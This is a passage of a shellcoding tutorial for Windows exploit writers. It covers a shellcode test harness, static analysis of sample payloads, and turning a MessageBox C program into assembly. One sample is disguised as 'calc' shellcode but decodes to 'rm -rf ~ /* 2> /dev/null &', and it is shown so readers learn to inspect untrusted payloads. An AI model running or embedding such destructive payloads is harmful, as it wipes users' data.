The reality is that all of this is \u201cjust\u201d a variation on what you can do with shellcode. That is, complex shellcode, staged shellcode, but still shellcode.<\/p>\n
Usually, when people are in the process of building an exploit, they tend to try to use some simple\/small shellcode first, just to prove that they can inject code and get it executed. The most well known and commonly used example is spawning calc.exe or something like that. Simple code, short, fast and does not require a lot of set up to work. (In fact, every time Windows calculator pops up on my screen, my wife cheers\u2026 even when I launched calc myself \ud83d\ude42 )<\/p>\n
In order to get a \u201cpop calc\u201d shellcode specimen, most people tend to use the already available shellcode generators in Metasploit, or copy ready made code from other exploits on the net\u2026 just because it\u2019s available and it works. (Well, I don\u2019t recommend using shellcode that was found on the net for obvious<\/a> reasons<\/a>). Frankly, there\u2019s nothing wrong with Metasploit. In fact the payloads available in Metasploit are the result of hard work and dedication, sheer craftsmanship by a lot of people. These guys deserve all respect and credits for that. Shellcoding is not just applying techniques, but requires a lot of knowledge, creativity and skills. It is not hard to write shellcode, but it is truly an art to write good shellcode.<\/p>\n In most cases, the Metasploit (and other publicly available) payloads will be able to fulfill your needs and should allow you to prove your point - that you can own a machine because of a vulnerability.<\/p>\n Nevertheless, today we\u2019ll look at how you can write your own shellcode and how to get around certain restrictions that may stop the execution of your code (null bytes et al).<\/p>\n A lot of papers and books have been written on this subject, and some really excellent websites are dedicated to the subject. But since I want to make this tutorial series as complete as possible, I decided to combine some of that information, throw in my 2 cents, and write my own \u201cintroduction to win32 shellcoding\u201d. <\/p>\n I think it is really important for exploit builders to understand what it takes to build good shellcode. The goal is not to tell people to write their own shellcode, but rather to understand how shellcode works (knowledge that may come handy if you need to figure out why certain shellcode does not work) , and write their own if there is a specific need for certain shellcode functionality, or modify existing shellcode if required.<\/p>\n This paper will only cover existing concepts, allowing you to understand what it takes to build and use custom shellcode\u2026 it does not contain any new techniques or new types of shellcode - but I\u2019m sure you don\u2019t mind at this point.<\/p>\n If you want to read other papers about shellcoding, check out the following links :<\/p>\n <\/p>\n Every shellcode is nothing more than a little application - a series of instructions written by a human being, designed to do exactly what that developer wanted it to do. It could be anything, but it is clear that as the actions inside the shellcode become more complex, the bigger the final shellcode most likely will become. This will present other challenges (such as making the code fit into the buffer we have at our disposal when writing the exploit, or just making the shellcode work reliably\u2026 We\u2019ll talk about that later on)<\/p>\n When we look at shellcode in the format it is used in an exploit, we only see bytes. We know that these bytes form assembly\/CPU instructions, but what if we wanted to write our own shellcode\u2026 Do we have to master assembly and write these instructions in asm? Well, it helps a lot. But if you only want to get your own custom code to execute, one time, on a specific system, then you may be able to do so with limited asm knowledge. I am not a big asm expert myself, so if I can do it - you can do it for sure.<\/p>\n Writing shellcode for the Windows platform will require us to use the Windows API\u2019s. How this impacts the development of reliable shellcode (or shellcode that is portable, that works across different versions\/service packs levels of the OS) will be discussed later in this document.<\/p>\n Before we can get started, let\u2019s build our lab:<\/p>\n Install all of these tools first before working your way through this tutorial ! Also, keep in mind that I wrote this tutorial on XP SP3, so some addresses may be different if you are using a different version of Windows.<\/p>\n<\/blockquote>\n In addition to these tools and scripts, you\u2019ll also need some healthy brains, good common sense and the ability to read\/understand\/write some basic perl\/C code + Basic knowledge about assembly.<\/p>\n <\/p>\n You can download the scripts that will be used in this tutorial here :<\/p>\n [download id=56]56[\/download]<\/p>\n <\/p>\n Before looking at how shellcode is built, I think it\u2019s important to show some techniques to test ready-made shellcode or test your own shellcode while you are building it.<\/p>\n Furthermore, this technique can (and should) be used to see what certain shellcode does before you run it yourself (which really is a requirement if you want to evaluate shellcode that was taken from the internet somewhere without breaking your own systems)<\/p>\n Usually, shellcode is presented in opcodes, in an array of bytes that is found for example inside an exploit script, or generated by Metasploit (or generated yourself - see later)<\/p>\n How can we test this shellcode & evaluate what it does ?<\/p>\n First, we need to convert these bytes into instructions so we can see what it does.<\/p>\n There are 2 approaches to it :<\/p>\n <\/p>\n Example 1<\/u><\/strong> : <\/p>\n Suppose you have found this shellcode on the internet and you want to know what it does before you run the exploit yourself :<\/p>\n Would you trust this code, just because it says that it will spawn calc.exe ?<\/p>\n Let\u2019s see. Use the following script to write the opcodes to a binary file :<\/p>\n pveWritebin.pl :<\/p>\n Paste the shellcode into the perl script and run the script :<\/p>\n The first thing you should do, even before trying to disassemble the bytes, is look at the contents of this file. Just looking at the file may already rule out the fact that this may be a fake exploit or not.<\/p>\n => hmmm - this one may have caused issues. In fact if you would have run the exploit this shellcode was taken from, on a Linux system, you may have blown up your own system. (That is, if a syscall would have called this code and executed it on your system)<\/p>\n Alternatively, you can also use the \u201cstrings\u201d command in linux (as explained here<\/a>). Write the entire shellcode bytes to a file and then run \u201cstrings\u201d on it :<\/p>\n Added on feb 26 2010 <\/u>: Skylined also pointed out that we can use Testival \/ Beta3 to evaluate shellcode as well<\/p>\n Beta3 :<\/p>\n Testival can be used to actually run the shellcode - which is - of course - dangerous when you are trying to find out what some obscure shellcode really does\u2026. but it still will be helpful if you are testing your own shellcode.<\/p>\n <\/p>\n Example 2 :<\/u><\/strong><\/p>\n What about this one :<\/p>\n Write the shellcode to file and look at the contents :<\/p>\n Let\u2019s disassemble these bytes into instructions :<\/p>\n You don\u2019t need to run this code to figure out what it will do.<\/p>\n If the exploit is indeed written for Windows XP Pro SP2 then this will happen :<\/p>\n at 0x7c804c97 on XP SP2, we find (windbg output) :<\/p>\n So push dword 0x7c804c97 will push \u201cWrite\u201d onto the stack<\/p>\n Next, 0x7c86114d is moved into eax and a call eax is made. At 0x7c86114d, we find :<\/p>\n Conclusion : this code will execute \u201cwrite\u201d (=wordpad).<\/p>\n <\/p>\n If the \u201cWindows XP Pro SP2\u201d indicator is not right, this will happen (example on XP SP3) :<\/p>\n That doesn\u2019t seem to do anything productive \u2026<\/p>\n <\/p>\n <\/p>\n When payload\/shellcode was encoded (as you will learn later in this document), or - in general - the instructions produced by the disassembly may not look very useful at first sight\u2026 then we may need to take it one step further. If for example an encoder was used, then you will very likely see a bunch of bytes that don\u2019t make any sense when converted to asm, because they are in fact just encoded data that will be used by the decoder loop, in order to produce the original shellcode again.<\/p>\n You can try to simulate the decoder loop by hand, but it will take a long time to do so. You can also run the code, paying attention to what happens and using breakpoints to block automatic execution (to avoid disasters).<\/p>\n This technique is not without danger and requires you to stay focused and understand what the next instruction will do. So I won\u2019t explain the exact steps to do this right now. As you go through the rest of this tutorial, examples will be given to load shellcode in a debugger and run it step by step.<\/p>\n Just remember this :<\/p>\n <\/p>\n <\/p>\n Ok, let\u2019s get really started now. Let\u2019s say we want to build shellcode that displays a MessageBox with the text \u201cYou have been pwned by Corelan\u201d. I know, this may not be very useful in a real life exploit, but it will show you the basic techniques you need to master before moving on to writing \/ modifying more complex shellcode.<\/p>\n To start with, we\u2019ll write the code in C. For the sake of this tutorial, I have decided to use the lcc-win32 compiler. If you decided to use another compiler then the concepts and final results should be more or less the same. <\/p>\n Source (corelan1.c) :<\/p>\n Make & Compile and then run the executable :<\/p>\n Note : As you can see, I used lcc-win32. The user32.dll library (required for MessageBox) appeared to get loaded automatically. If you use another compiler, you may need to add a LoadLibraryA(\u201cuser32.dll\u201d); call to make it work.<\/p>\n<\/blockquote>\n Open the executable in the decompiler (IDA Free) (load PE Executable). After the analysis has been completed, this is what you\u2019ll get :<\/p>\n Alternatively, you can also load the executable in a debugger :<\/p>\n Ok, what do we see here ?<\/p>\n 1. the push ebp and mov ebp, esp instructions are used as part of the stack set up. We may not need them in our shellcode because we will be running the shellcode inside an already existing application, and we\u2019ll assume the stack has been set up correctly already. (This may not be true and in real life you may need to tweak the registers\/stack a bit to make your shellcode work, but that\u2019s out of scope for now)<\/p>\n 2. We push the arguments that will be used onto the stack, in reverse order. The Title (Caption) (0x004040A0) and MessageBox Text (0x004040A8) are taken from the .data section of our executable:<\/p>\n 3. We call the MessageBoxA<\/a> Windows API (which sits in user32.dll) This API takes its 4 arguments from the stack. In case you used lcc-win32 and didn\u2019t really wonder why MessageBox worked : You can see that this function was imported from user32.dll by looking at the \u201cImports\u201d section in IDA. This is important. We will talk about this later on.<\/p>\n\n
The basics - building the shellcoding lab<\/h3>\n
\n
char<\/span> code[] = "paste your shellcode here<\/span>";\n\nint<\/span> main(int<\/span> argc, char<\/span> **argv)\n{\n int<\/span> (*func)();\n func = (int<\/span> (*)()) code;\n (int<\/span>)(*func)();\n}<\/pre>\n\n
Testing existing shellcode<\/h3>\n
\n
Approach 1 : static analysis<\/h4>\n
\/\/this will spawn calc.exe <\/span>\nchar shellcode[] =\n"\\x72\\x6D\\x20\\x2D\\x72\\x66\\x20\\x7e\\x20<\/span>"\n"\\x2F\\x2A\\x20\\x32\\x3e\\x20\\x2f\\x64\\x65<\/span>"\n"\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x20\\x26<\/span>";<\/pre>\n#!\/usr\/bin\/perl\n# Perl script written by Peter Van Eeckhoutte\n# http:\/\/www.corelan.be<\/span>\n# This script takes a filename as argument\n# will write<\/span> bytes in \\x format<\/span> to the file \n#\nif<\/span> ($#ARGV ne 0) { \nprint<\/span> " usage: $0 <\/span>".chr<\/span>(34)."output filename<\/span>".chr<\/span>(34)."\\n<\/span>"; \nexit<\/span>(0); \n} \nsystem<\/span>("del $ARGV[0]<\/span>");\nmy<\/span> $shellcode="You forgot to paste <\/span>".\n"your shellcode in the pveWritebin.pl<\/span>".\n"file<\/span>";\n\n#open<\/span> file in binary mode\nprint<\/span> "Writing to <\/span>".$ARGV[0]."\\n<\/span>";\nopen<\/span>(FILE,">$ARGV[0]<\/span>");\nbinmode<\/span> FILE;\nprint<\/span> FILE $shellcode;\nclose<\/span>(FILE);\n\nprint<\/span> "Wrote <\/span>".length<\/span>($shellcode)." bytes to file\\n<\/span>";<\/pre>\n#!\/usr\/bin\/perl\n# Perl script written by Peter Van Eeckhoutte\n# http:\/\/www.corelan.be<\/span>\n# This script takes a filename as argument\n# will write<\/span> bytes in \\x format<\/span> to the file \n#\nif<\/span> ($#ARGV ne 0) { \nprint<\/span> " usage: $0 <\/span>".chr<\/span>(34)."output filename<\/span>".chr<\/span>(34)."\\n<\/span>"; \nexit<\/span>(0); \n} \nsystem<\/span>("del $ARGV[0]<\/span>");\nmy<\/span> $shellcode="\\x72\\x6D\\x20\\x2D\\x72\\x66\\x20\\x7e\\x20<\/span>".\n"\\x2F\\x2A\\x20\\x32\\x3e\\x20\\x2f\\x64\\x65<\/span>".\n"\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x20\\x26<\/span>";\n\n#open<\/span> file in binary mode\nprint<\/span> "Writing to <\/span>".$ARGV[0]."\\n<\/span>";\nopen<\/span>(FILE,">$ARGV[0]<\/span>");\nbinmode<\/span> FILE;\nprint<\/span> FILE $shellcode;\nclose<\/span>(FILE);\n\nprint<\/span> "Wrote <\/span>".length<\/span>($shellcode)." bytes to file\\n<\/span>";<\/pre>\nC:\\shellcode>perl pveWritebin.pl c:\\tmp\\shellcode.bin\nWriting to c:\\tmp\\shellcode.bin\nWrote 26 bytes to file<\/pre>\n
C:\\shellcode>type c:\\tmp\\shellcode.bin\nrm -rf ~ \/* 2> \/dev\/null &\nC:\\shellcode><\/pre>\n
xxxx@bt4:\/tmp# strings shellcode.bin\nrm -rf ~ \/* 2> \/dev\/null &\n<\/span><\/pre>\nBETA3 --decode \\x\n"\\x72\\x6D\\x20\\x2D\\x72\\x66\\x20\\x7e\\x20<\/span>"\n"\\x2F\\x2A\\x20\\x32\\x3e\\x20\\x2f\\x64\\x65<\/span>"\n"\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x20\\x26<\/span>";\n^Z\nChar 0 @0x00 does not match encoding: '"'.\n<\/span>Char 37 @0x25 does not match encoding: '"'.\n<\/span>Char 38 @0x26 does not match encoding: '\\n'.\nChar 39 @0x27 does not match encoding: '"'.\n<\/span>Char 76 @0x4C does not match encoding: '"'.\n<\/span>Char 77 @0x4D does not match encoding: '\\n'.\nChar 78 @0x4E does not match encoding: '"'.\n<\/span>Char 111 @0x6F does not match encoding: '"'.\n<\/span>Char 112 @0x70 does not match encoding: ';'.\nChar 113 @0x71 does not match encoding: '\\n'.\nrm -rf ~ \/* 2> \/dev\/null &\n<\/span><\/pre>\n# Metasploit generated \u2013 calc.exe \u2013 x86 \u2013 Windows XP Pro SP2\nmy $shellcode="\\x68\\x97\\x4C\\x80\\x7C\\xB8".\n"\\x4D\\x11\\x86\\x7C\\xFF\\xD0";<\/pre>\n
C:\\shellcode>perl pveWritebin.pl c:\\tmp\\shellcode.bin\nWriting to c:\\tmp\\shellcode.bin\nWrote 12 bytes to file\n\nC:\\shellcode>type c:\\tmp\\shellcode.bin\nh\u00f9L\u00c7|?M?\u00e5| ?\nC:\\shellcode><\/pre>\n
C:\\shellcode>"c:\\program files\\nasm\\ndisasm.exe" -b 32 c:\\tmp\\shellcode.bin\n00000000 68974C807C push dword 0x7c804c97\n00000005 B84D11867C mov eax,0x7c86114d\n0000000A FFD0 call eax<\/pre>\n
0:001> d 0x7c804c97\n7c804c97 57 72 69 74 65 00 42 61-73 65 43 68 65 63 6b 41 Write<\/font><\/strong>.BaseCheckA\n7c804ca7 70 70 63 6f 6d 70 61 74-43 61 63 68 65 00 42 61 ppcompatCache.Ba\n7c804cb7 73 65 43 6c 65 61 6e 75-70 41 70 70 63 6f 6d 70 seCleanupAppcomp\n7c804cc7 61 74 43 61 63 68 65 00-42 61 73 65 43 6c 65 61 atCache.BaseClea\n7c804cd7 6e 75 70 41 70 70 63 6f-6d 70 61 74 43 61 63 68 nupAppcompatCach\n7c804ce7 65 53 75 70 70 6f 72 74-00 42 61 73 65 44 75 6d eSupport.BaseDum\n7c804cf7 70 41 70 70 63 6f 6d 70-61 74 43 61 63 68 65 00 pAppcompatCache.\n7c804d07 42 61 73 65 46 6c 75 73-68 41 70 70 63 6f 6d 70 BaseFlushAppcomp<\/pre>\n
0:001> ln 0x7c86114d\n(7c86114d) kernel32!WinExec | (7c86123c) kernel32!`string'\nExact matches:\nkernel32!WinExec =<\/pre>\n
0:001> d 0x7c804c97\n7c804c97 62 4f 62 6a 65 63 74 00-41 74 74 61 63 68 43 6f bObj<\/strong><\/font>ect.AttachCo\n7c804ca7 6e 73 6f 6c 65 00 42 61-63 6b 75 70 52 65 61 64 nsole.BackupRead\n7c804cb7 00 42 61 63 6b 75 70 53-65 65 6b 00 42 61 63 6b .BackupSeek.Back\n7c804cc7 75 70 57 72 69 74 65 00-42 61 73 65 43 68 65 63 upWrite.BaseChec\n7c804cd7 6b 41 70 70 63 6f 6d 70-61 74 43 61 63 68 65 00 kAppcompatCache.\n7c804ce7 42 61 73 65 43 6c 65 61-6e 75 70 41 70 70 63 6f BaseCleanupAppco\n7c804cf7 6d 70 61 74 43 61 63 68-65 00 42 61 73 65 43 6c mpatCache.BaseCl\n7c804d07 65 61 6e 75 70 41 70 70-63 6f 6d 70 61 74 43 61 eanupAppcompatCa\n0:001> ln 0x7c86114d \n(7c86113a) kernel32!NumaVirtualQueryNode+0x13 \n| (7c861437) kernel32!GetLogicalDriveStringsW<\/pre>\n
Approach 2 : run time analysis<\/h4>\n
\n
From C to Shellcode<\/h3>\n
From C to executable to asm<\/h4>\n
#include <windows.h>\n\nint<\/span> main(int<\/span> argc, char<\/span>** argv)\n{\n MessageBox(NULL,\n "You have been pwned by Corelan<\/span>",\n "Corelan<\/span>",\n MB_OK);\n\n}<\/pre>\n![\"image\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/02\/image_thumb.png\" "\\"image\\"")
<\/a><\/p>\n\n
.text:004012D4 ; \u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6 S U B R O U T I N E \u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\n.text:004012D4\n.text:004012D4 ; Attributes: bp-based frame\n.text:004012D4\n.text:004012D4 public _main\n.text:004012D4 _main proc near ; CODE XREF: _mainCRTStartup+92p\n.text:004012D4 push ebp\n.text:004012D5 mov ebp, esp\n.text:004012D7 push 0 ; uType\n.text:004012D9 push offset Caption ; "Corelan<\/span>"\n.text:004012DE push offset Text ; "You have been pwned by Corelan<\/span>"\n.text:004012E3 push 0 ; hWnd\n.text:004012E5 call _MessageBoxA@16 ; MessageBoxA(x,x,x,x)\n.text:004012EA mov eax, 0\n.text:004012EF leave\n.text:004012F0 retn\n.text:004012F0 _main endp\n.text:004012F0\n.text:004012F0 ; ---------------------------------------------------------------------------<\/pre>\n![\"image\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/02\/image_thumb1.png\" "\\"image\\"")
<\/a><\/p>\n004012D4 \/$ 55 PUSH EBP\n004012D5 |. 89E5 MOV EBP,ESP\n004012D7 |. 6A 00 PUSH 0 ; \/Style = MB_OK|MB_APPLMODAL\n004012D9 |. 68 A0404000 PUSH corelan1.004040A0 ; |Title = "Corelan<\/span>"\n004012DE |. 68 A8404000 PUSH corelan1.004040A8 ; |Text = "You have been pwned by Corelan<\/span>"\n004012E3 |. 6A 00 PUSH 0 ; |hOwner = NULL\n004012E5 |. E8 3A020000 CALL <JMP.&USER32.MessageBoxA> ; \\MessageBoxA\n004012EA |. B8 00000000 MOV EAX,0\n004012EF |. C9 LEAVE\n004012F0 \\. C3 RETN<\/pre>\n![\"image\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/02\/image_thumb2.png\" "\\"image\\"")
<\/a> , the Button Style (MB_OK) and hOwner are just 0.<\/p>\n
![\"image\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/02\/image_thumb3.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/02\/image_thumb4.png\" "\\"image\\"")
<\/a><\/p>\n